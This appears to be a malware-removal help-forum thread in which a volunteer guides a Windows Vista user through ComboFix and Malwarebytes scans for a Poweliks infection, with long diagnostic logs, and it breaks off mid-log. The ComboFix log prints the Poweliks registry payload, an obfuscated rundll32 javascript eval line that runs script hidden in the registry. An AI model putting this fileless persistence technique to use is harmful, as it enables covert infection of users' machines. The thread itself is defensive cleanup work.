Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/23/2014 04:24:01 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\HISTORY-JOURNAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:53 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\MANIFEST-000002> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA-JOURNAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES-JOURNAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOCK> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:46 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\000002.DBTMP> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
 
System errors:
=============
Error: (08/23/2014 04:23:55 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (08/23/2014 04:23:32 PM) (Source: WMPNetworkSvc) (EventID: 14325) (User: )
Description: WMPNetworkSvc0x80070424
 
Error: (08/23/2014 04:23:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AVGIDSDriver
AVGIDSShim
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: vToolbarUpdater%%2
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: AVGIDSAgentAVGIDSDriver%%31
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Computer Browser%%1060
 
Error: (08/23/2014 04:13:21 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
Error: (08/23/2014 04:09:54 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
Error: (08/23/2014 04:04:22 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
 
Microsoft Office Sessions:
=========================
Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-08-23 16:55:09.878
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.753
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.581
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.441
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.223
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.113
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:08.989
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:08.879
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:54:50.034
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:54:49.909
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 54%
Total physical RAM: 3069.46 MB
Available physical RAM: 1392.41 MB
Total Pagefile: 6375.2 MB
Available Pagefile: 4531.66 MB
Total Virtual: 2047.88 MB
Available Virtual: 1882.66 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:223.01 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive f: () (Removable) (Total:14.61 GB) (Free:13.1 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 14.6 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=14.6 GB) - (Type=0C)
 
==================== End Of Log ============================

My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat :)

Before we start please note the following:

  • Analysis and research take some time, also sometimes real life gets in the way, please be patient.
  • Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
  • Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
  • Paste the logs in your posts, attachments make my work harder and more complicated.
  • Stay with me to the end, the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, which may cause some delays between answers.

I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

Let's start and enjoy the fight! :)

Rules and policies

We won't support any piracy.

That being said, if any evidence of an illegal OS, software, cracks/keygens or anything similar is revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result in closing your topic and withdrawing any assistance.

You have got a Poweliks infection.

Scan with ComboFix

This is a very powerful tool that should be used only if advised by a Malware Analyst.

Do not run ComboFix on your own!

Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.

Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on the ComboFix icon and select Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.

If you encounter any issues with your internet connection after running ComboFix, please visit this link.

If an error about an operation on a key marked for deletion appears after running the tool, please reboot your machine.

Don't forget to re-enable your previously switched-off protection software!


Hello, Naat.

 

Here's the Combofix log. I see a reference to the Poweliks infection you mentioned.

 

ComboFix 14-08-21.01 - savas.kyriakidis 08/24/2014  15:26:27.3.2 - x86
Running from: F:\ComboFix.exe
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         [encoded script data removed]
.
(((((((((((((((((((((((((   Files Created from 2014-07-24 to 2014-08-24  )))))))))))))))))))))))))))))))
.
.
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-23 21:01 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-23 21:21 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-23 20:30 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 20:16 . 2014-08-24 19:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-23 15:02 . 2014-08-23 15:05 -------- d-----w- c:\programdata\Spybot - Search & Destroy
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-22 17:27 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 20:51 . 2014-08-12 20:51 -------- d-----w- c:\programdata\IrfuqApivh
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"IrfuqApivh"="c:\programdata\IrfuqApivh\IrfuqApivh.dat" [2014-08-19 252020]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]
"Spybot-S&D Cleaning"="c:\windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe" [2014-06-24 4566952]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ   Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ   HPSLPSVC
hpdevmgmt REG_MULTI_SZ   hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-24 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-24 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-08-24 15:40
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...  
.
scanning hidden autostart entries ... 
.
scanning hidden files ...  
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984)
.
------------------------ Other Running Processes ------------------------
.
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\program files\Dell\DellDock\DockLogin.exe
c:\windows\system32\WLANExt.exe
c:\program files\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files\AVG\AVG10\avgfws.exe
c:\program files\AVG\AVG10\avgwdsvc.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\windows\dwrcs\DWRCS.EXE
c:\windows\system32\lxblcoms.exe
c:\windows\system32\msiexec.exe
c:\program files\HTC\Internet Pass-Through\PassThruSvr.exe
c:\program files\Sony\PMB\PMBDeviceInfoProvider.exe
c:\program files\NETGEAR\WNA1100\WifiSvc.exe
c:\windows\system32\WUDFHost.exe
c:\program files\AVG\AVG10\avgnsx.exe
c:\program files\Dell\DellDock\DellDock.exe
c:\program files\Glary Utilities 5\Integrator.exe
c:\windows\RtHDVCpl.exe
c:\windows\System32\rundll32.exe
c:\program files\ActivIdentity\ActivClient\acsagent.exe
c:\program files\HP\Digital Imaging\bin\hpqtra08.exe
c:\program files\NETGEAR\WNA1100\WNA1100.exe
c:\program files\Microsoft Office\Office12\ONENOTEM.EXE
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
c:\windows\ehome\ehmsas.exe
c:\windows\system32\rundll32.exe
c:\program files\iPod\bin\iPodService.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
c:\program files\HP\Digital Imaging\bin\hpqSTE08.exe
c:\program files\HP\Digital Imaging\bin\hpqbam08.exe
c:\program files\HP\Digital Imaging\bin\hpqgpc01.exe
c:\program files\Common Files\Apple\Internet Services\APSDaemon.exe
c:\\?\c:\windows\system32\wbem\WMIADAP.EXE
c:\program files\Windows Media Player\wmpnetwk.exe
c:\windows\system32\rundll32.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
.
**************************************************************************
.
Completion time: 2014-08-24  15:45:51 - machine was rebooted
ComboFix-quarantined-files.txt  2014-08-24 19:45
ComboFix2.txt  2014-08-23 20:16
ComboFix3.txt  2014-08-23 18:22
.
Pre-Run: 238,198,915,072 bytes free
Post-Run: 238,199,603,200 bytes free
.
- - End Of File - - 836BEC6E629D99F479DEE501CB2CA845
5C616939100B85E558DA92B899A0FC36

Good so far.


Scan with Malwarebytes' Anti-Malware

Please download and install Malwarebytes Anti-Malware, or re-run it if you already have it installed.

  • First of all select update.
  • Once updated, click the Settings tab, in the left panel choose Detections & protection and tick Scan for rootkits.
  • Click the Scan tab, make sure Threat Scan is checked and click Scan Now.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • At the bottom click Export and choose Text file.

Save the file to your desktop and include its content in your next reply.



Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.


I was able to run MBAM and FRST without having to go into safe mode. So, that's progress at least. Still getting a lot of automatic web page generation, though. Here are the requested logs:

 

MBAM

 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/25/2014
Scan Time: 8:28:24 AM
Logfile: MBAM.txt
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.08.25.02
Rootkit Database: v2014.08.21.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows Vista Service Pack 2
CPU: x86
File System: NTFS
User: savas.kyriakidis
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 355293
Time Elapsed: 27 min, 27 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 4
